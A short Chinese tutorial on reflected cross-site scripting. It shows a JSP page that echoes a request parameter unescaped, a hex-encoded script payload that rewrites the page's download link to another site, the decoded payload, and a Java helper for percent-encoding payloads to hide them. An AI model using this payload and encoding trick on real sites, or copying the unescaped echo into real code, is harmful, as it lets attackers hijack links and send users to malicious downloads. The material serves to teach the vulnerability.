XSS跨站攻击2

JSP代码：

<%@ page language="java" contentType="text/html; charset=UTF-8"
	pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
<%
	String name = request.getParameter("name");
%>
Welcome <%=name %><br>
<a href="#">Click to Download</a>
</body>
</html>

在浏览器输入的参数为：

name=yang%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%20%7B%76%61%72%20%6C%69%6E%6B%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%61%22%29%3B%6C%69%6E%6B%5B%30%5D%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%63%73%64%6E%2E%6E%65%74%2F%22%3B%7D%3C%2F%73%63%72%69%70%74%3E

后面的16进制变为ascii码，则是：

name=yang<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://www.csdn.net/";}</script>

在禁用XSS筛选器的前提下，在IE8里的效果是：

左下角的状态栏，变成了http://www.csdn.net/，而源代码里是"#"。

此时，360安全浏览器也不安全了，因为禁用了XSS筛选器。

用java把ascii转换成16进制的代码：

	public static void convert(String ascii) {
		char[] ches = ascii.toCharArray();
		for (char ch: ches) {
			System.out.format("%%%H", ch);
		}
	}